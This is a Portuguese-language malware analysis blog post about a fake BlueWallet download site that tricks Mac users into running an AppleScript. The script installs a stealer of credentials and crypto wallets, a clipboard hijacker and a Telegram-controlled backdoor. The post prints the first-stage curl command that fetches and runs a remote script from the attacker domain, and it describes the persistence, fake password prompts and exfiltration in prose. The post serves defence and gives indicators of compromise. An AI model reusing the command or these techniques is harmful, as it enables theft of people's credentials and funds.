Privacy, Fraudes, Informações sobre ameaças

A falsa BlueWallet rouba palavras-passe, contas e criptomoedas de computadores Mac

por Stefan Dasic | 1 de junho de 2026
A falsa BlueWallet rouba palavras-passe, contas e criptomoedas de computadores Mac

Um site falso que se faz passar pela BlueWallet (uma carteira de Bitcoin real) está a visar Mac com um ataque simples, mas eficaz. A própria BlueWallet não foi comprometida. Em vez disso, os cibercriminosos roubaram o nome e a marca da carteira de Bitcoin legítima para fazer com que um download malicioso pareça fiável.

Se procurou uma carteira de criptomoedas e acabou por chegar a uma destas páginas falsas de download da BlueWallet, o site tentou induzi-lo a abrir um ficheiro descarregado numa ferramenta integrada do macOS e a clicar em «Executar». Se seguiu essas instruções, o malware poderia roubar palavras-passe guardadas, dados de início de sessão do navegador, carteiras de criptomoedas, documentos e outros dados confidenciais. Além disso, o malware monitoriza a área de transferência em busca de endereços de carteiras de criptomoedas e pode substituí-los por endereços controlados pelo atacante.

Essa última funcionalidade é particularmente perigosa. Se copiar o endereço de uma carteira antes de enviar fundos, o malware pode substituí-lo discretamente pelo endereço do atacante. Tudo parece normal no ecrã, mas o dinheiro vai parar a outro lugar.

Deve preocupar-se? Só se tiver descarregado e executado o ficheiro. O simples facto de visitar a página e fechá-la não tem qualquer efeito por si só. O ataque depende inteiramente de o utilizador abrir o script e clicar em «Reproduzir».

Se tiver executado o programa, considere o computador como comprometido e siga os passos abaixo.

O que fazer se tiver executado o programa

Se abriu o ficheiro e clicou em «Reproduzir», considere que o seu dispositivo foi comprometido e siga estes passos:

  • Desligue a máquina da rede para interromper o canal de controlo
  • Execute uma verificação completa do dispositivo e certifique-se de que está a utilizar software de segurança atualizado com a proteção na Web ativada
  • A partir de um dispositivo diferente e de confiança, altere as palavras-passe de todas as contas utilizadas no Mac, começando pelo e-mail e pelas plataformas de criptomoedas
  • Transfira qualquer criptomoeda para uma nova carteira criada num dispositivo sem dados
  • Considere as frases-semente e as chaves existentes como expostas
  • Antes de enviar criptomoedas no futuro, verifique o endereço de destino completo, caractere por caractere
  • Verifique se existem ficheiros desconhecidos em ~/Library/LaunchAgents
  • Procura um segredo .sysupd.sh arquivo em /tmp
  • Alterne as credenciais do Cloud e do SSH se .ssh, .aws, ou .gnupg havia ficheiros no computador
  • Em caso de dúvida, faça uma cópia de segurança dos seus dados e reinstale o macOS a partir de uma fonte comprovadamente fiável, em vez de tentar fazer uma limpeza no local

Compraste algo que não devias?

Técnicas de engenharia social

A parte mais interessante desta campanha não é de natureza técnica. Os atacantes não invadiram o Mac contornaram as medidas de segurança da Apple. Em vez disso, convenceram as vítimas a executarem elas próprias o malware.

O site falso orienta os utilizadores ao longo do processo com uma página de download convincente, instruções simples e até mesmo um atalho de teclado. O ataque é bem-sucedido porque a vítima confia no que está a ver.

À medida que os sistemas operativos se tornam mais eficazes no bloqueio de software malicioso, os atacantes investem cada vez mais na engenharia social. Em vez de procurarem formas de contornar os controlos de segurança, convencem as pessoas a ignorá-los.

É por isso que há um hábito que se está a tornar cada vez mais importante: desconfie de qualquer ficheiro para download que venha acompanhado de instruções para o abrir numa ferramenta de scripts, num utilitário de programador ou numa janela do Terminal e clicar em «Executar».

Nesta campanha, bastou premir uma vez a combinação ⌘R para transformar um Mac programa de roubo de palavras-passe, num ladrão de carteiras de criptomoedas, num sequestrador da área de transferência e numa ferramenta de acesso remoto.

Análise técnica

Primeira fase: O programa de download do AppleScript

A página encontra-se em update-bluewallet[.]com, um nome de domínio suficientemente semelhante ao da carteira real (bluewallet.io) para dar uma vista de olhos rápida. A primeira coisa que a página faz é não esperar pelo consentimento. O seu script aciona uma rotina de download com um temporizador de dois segundos assim que a página carrega, e volta a fazê-lo se o visitante clicar em qualquer um dos dois botões.

O ficheiro que fica na pasta «Downloads» chama-se BlueWallet Installer.applescript, uma extensão que a maioria das pessoas nunca viu e em relação à qual não tem qualquer motivo para desconfiar.

Em seguida, a página faz algo discretamente engenhoso. Após um breve intervalo, reescreve o seu próprio texto de estado para que pareça um conjunto de instruções de configuração: abra o instalador e, em seguida, prima o botão de reprodução ou ⌘R. Chega mesmo a desenhar um pequeno triângulo azul de reprodução no texto, para que a formulação corresponda à verdadeira interface do Script Editor que a vítima está prestes a ver.

Site falso da BlueWallet que orienta a vítima no processo de descarregar e executar o script malicioso

A página orienta a vítima passo a passo sobre o que deve fazer para executar o ficheiro.

No macOS atual, uma aplicação não assinada descarregada da Internet é colocada em quarentena e verificada antes de poder ser executada. Um script simples aberto no Script Editor e executado pelo utilizador contorna esse processo. O utilizador está a instruir manualmente uma ferramenta de confiança da Apple para executar código, pelo que não há qualquer etapa de certificação que possa falhar.

É por isso que o atacante optou por um AppleScript em vez de uma aplicação empacotada: assim, a ação arriscada deixa de estar nas mãos do sistema operativo e passa a estar nas mãos da vítima.

O próprio AppleScript é notavelmente curto. Sem os comentários decorativos, incluindo um número de versão falso e uma linha que alega ser uma «Atualização de Instalação do Brew», ele executa um único comando shell codificado em base64 e, em seguida, instrui o Script Editor a fechar sem guardar, removendo assim qualquer vestígio da ação.

Instalação, atualização e compilação

Em resumo, esse comando faz o seguinte:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

O programa obtém um segundo script de um servidor remoto, guarda-o num ficheiro oculto no diretório temporário, torna-o executável e executa-o em segundo plano, ocultando toda a saída.

A vítima não vê nada. O nome do ficheiro .sysupd.sh está disfarçado para parecer uma atualização do sistema. Trata-se de um dropper encenado clássico: a primeira fase é minúscula e descartável, e a sua única função é ir buscar a verdadeira carga útil.

Segunda fase: Análise da carga útil

As primeiras linhas definem como o malware pretende funcionar. Ele define umask 077 assim, tudo o que cria só pode ser lido pelo utilizador comprometido, criando depois um diretório de trabalho oculto com um nome aleatório em /tmp proveniente de /dev/urandom.

A sua configuração está ofuscada, mas de forma pouco eficaz. Uma pequena função chamada _xd percorre uma cadeia hexadecimal dois caracteres de cada vez e aplica a operação XOR a cada byte em relação a uma chave repetitiva pré-definida: swckR9JCD2Uu.

Essa função descodifica o token do bot do Telegram, o identificador do chat, o token de comando secundário e o URL de teste do script em tempo de execução. É suficiente para contornar ferramentas que apenas procuram cadeias de texto simples, mas não muito mais do que isso. Como a chave e o algoritmo se encontram ambos no ficheiro, todos os valores codificados são totalmente recuperáveis.

Há um detalhe que se destaca: o conteúdo descodificado do chat do Telegram e o conteúdo descodificado do chat de comando e controlo são idênticos. O atacante está a utilizar um único canal do Telegram tanto como ponto de entrega para a exfiltração de dados como canal de controlo. É uma solução económica, escalável, encriptada e que se mistura com o tráfego HTTPS normal.

Nem tudo está ofuscado. Os endereços utilizados para o sequestro da área de transferência encontram-se no ficheiro em texto simples: um endereço Bitcoin, um endereço Ethereum e um endereço Solana. Estes são os endereços que o implante substitui quando deteta que o utilizador está a copiar um endereço de carteira. Como são públicos nas respetivas cadeias de blocos, estão também entre os artefactos mais úteis de toda a amostra.

O que o malware rouba

As rotinas de recolha da segunda fase são abrangentes. Abrangem seis grandes categorias.

1. Navegadores da Web

O script extrai o histórico, os cookies, os dados de início de sessão e os favoritos de uma vasta gama de navegadores, incluindo:

  • Navegadores baseados no Chromium: Google Chrome , Beta, Canary e Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; e Yandex
  • Navegadores baseados no Firefox: Firefox, Waterfox, Pale Moon, Zen e LibreWolf
  • Dados do navegador nativo do macOS: cookies, histórico e valores de formulários do Safari

2. Carteiras de criptomoedas

Este parece ser o foco principal do guião.

Destina-se a aplicações de carteiras para computador, incluindo Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop e Tonkeeper.

Também tem como alvo as carteiras de extensão de navegador em vários ecossistemas:

  • Bitcoin: Xverse , Leather, UniSat, Alby e Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet e Slope
  • Carteiras EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin e XDEFI
  • Cosmos: Keplr , Station e Cosmostation
  • Outros ecossistemas: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos e Temple

3. Gestores de palavras-passe e ferramentas de segurança

O malware tem como alvo o armazenamento local e as configurações de vários gestores de palavras-passe, incluindo LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt e Buttercup.

Além disso, procura dados associados à autenticação de dois fatores (2FA) e a ferramentas de autenticação, incluindo o Google Authenticator, o Authy, o Duo, o Microsoft Authenticator, o 2FAS e o FreeOTP.

4. Aplicações de comunicação e redes sociais

O script tenta copiar os dados da sessão e o armazenamento local do Telegram Desktop e do Discord, incluindo o Discord Canary e o Discord PTB.

5. Ferramentas para programadores e na nuvem

Procura credenciais e ficheiros de configuração no diretório pessoal do utilizador, incluindo:

  • Configurações da AWS CLI em .aws
  • Chaves SSH em .ssh
  • Chaves GnuPG em .gnupg
  • Configurações do Kubernetes em .kube
  • Ficheiros Shell e Git, incluindo .zshrc, .zsh_history, .bash_history, e .gitconfig

6. Aplicações de produtividade e ficheiros gerais

O script copia a base de dados local do Apple Notes, NoteStore.sqlite.

Procura também dados de extensões do navegador relacionados com ferramentas de compras e produtividade, incluindo Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist e Google Keep.

Por fim, procura nos pastas «Área de Trabalho», «Documentos» e «Transferências» por ficheiros com extensões que incluam .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, e .env, dentro de um limite de tamanho.

O que faz com os dados roubados

O malware tenta obter diretamente a palavra-passe da conta do utilizador. Um osascript A janela de diálogo intitulada «Preferências do Sistema» solicita ao utilizador que volte a introduzir a sua palavra-passe «para continuar». O script verifica cada tentativa em relação a dscl . authonly antes de o guardar, pelo que só pára quando tiver uma credencial válida.

Para a exfiltração, arquiva os dados transferidos utilizando o próprio sistema do macOS ditto, provavelmente porque está sempre presente, ao contrário de zip. Para não ultrapassar o limite de 50 MB de upload do Telegram, divide os arquivos maiores em partes de 49 MB com split antes de enviar cada peça.

Estabelece a persistência ao gravar um ficheiro plist do LaunchAgent no diretório do utilizador ~/Library/LaunchAgents, apoiado por um diretório de suporte oculto, e carregando-o com launchctl para que o implante seja executado novamente a cada vez que se iniciar sessão.

O «clipboard hijack» é um loop em segundo plano em tempo real. Um clip_watch A função verifica continuamente a área de transferência, identifica os formatos de endereços de Bitcoin, Ethereum e Solana através de expressões regulares, comunica o endereço original ao canal de comando e controlo e substitui o conteúdo da área de transferência pelo endereço do atacante através de pbcopy.

Isso significa que a substituição ocorre silenciosamente durante o processo de copiar e colar.

Por fim, o malware pode ser controlado de forma interativa. A c2_loop consulta o bot do Telegram para obter comandos e suporta um conjunto completo de ferramentas para operadores:

  • /info para obter informações sobre o sistema
  • /exec para comandos arbitrários do shell
  • /clipboard para ler o conteúdo atual da área de transferência
  • /download para extrair ficheiros específicos
  • /exfil para executar novamente o módulo de roubos
  • /selfdestruct para apagar vestígios

Isto torna o canal do Telegram uma ligação de controlo remoto em tempo real, e não apenas um canal de comunicação unidirecional.

Vivendo da terra e do Telegram

O padrão aqui é conhecido e está a tornar-se cada vez mais comum: recorrer a ferramentas que já inspiram confiança.

A entrega aproveita-se do próprio Script Editor da Apple. A configuração está oculta por um simples XOR, em vez de binários compactados. O canal de comando utiliza a API de bots do Telegram, que consegue passar pelos filtros de saída que sinalizariam um servidor desconhecido.

Nenhuma destas peças é, por si só, inovadora. A eficácia reside na combinação de componentes com aparência legítima, de modo a que nenhuma etapa isolada acione um alarme.

Oportunidades de deteção

As lições aqui não se centram tanto na isca, mas sim na própria técnica.

Editor de scripts a executar um código Base64 de uma linha do shell script que se fecha imediatamente é um forte indício comportamental e um alvo de deteção muito melhor do que o ficheiro descartável da primeira fase. O mesmo se aplica a um ficheiro oculto /tmp/.sysupd.sh transferido por curl e é executado em segundo plano.

Os navegadores e as plataformas de download poderiam tratar .applescript arquivos provenientes da Internet com o mesmo grau de desconfiança que os executáveis. E o Telegram continua a ser um meio de comando e controlo pouco explorado, cuja utilização abusiva de tokens de bot poderia ser interrompida na origem através de denúncias.

Indicadores de comprometimento

Hashes de ficheiros (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Indicadores de rede

  • update-bluewallet[.]com
  • projects2026box[.]com

Endereços de sequestro da área de transferência

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Não nos limitamos a comunicar as ameaças - eliminamo-las

Os riscos de cibersegurança nunca se devem propagar para além de uma manchete. Mantenha as ameaças longe dos seus dispositivos descarregando Malwarebytes hoje mesmo.

Sobre o autor

Stefan Dasic

Stefan Dasic

Apaixonado por soluções antivírus, Stefan tem estado envolvido em testes de malware e controlo de qualidade de produtos AV desde muito cedo. Como parte da equipa Malwarebytes , Stefan dedica-se a proteger os clientes e a garantir a sua segurança.

ÚLTIMOS ARTIGOS

Notícias
semana da segurança

Uma semana no mundo da segurança (maio 25 – maio 31)

junho 1, 2026

Uma lista dos temas que abordámos na semana de 25 a 31 de maio de 2026

Podcast
Um cadeado ilustrado é montado num suporte de microfone com ondas sonoras emitidas pelo dispositivo.

As aplicações de pagamentos estão a ouvir o que dizes (Lock and Code, 7.ª temporada, episódio 11)

maio 31, 2026

Esta semana, no podcast «Lock and Code», conversamos com Rainey Reitman sobre a censura financeira que exclui clientes das principais aplicações de pagamentos.

Notícias
Logótipo da Signal

Utilizadores do Signal são alvo de ataques de phishing destinados a roubar cópias de segurança

maio 29, 2026

Os cibercriminosos estão a fazer-se passar pelo Serviço de Apoio do Signal para roubar chaves de recuperação de cópias de segurança, o que lhes dá acesso a todos os arquivos de mensagens das vítimas.

Artigos relacionados

Ícone dos contribuidores

Contribuintes

Ícone do Centro de Ameaças

Centro de Ameaças

Ícone de podcasts

Podcast

Ícone do glossário

Glossário

Ícone de burla

Fraudes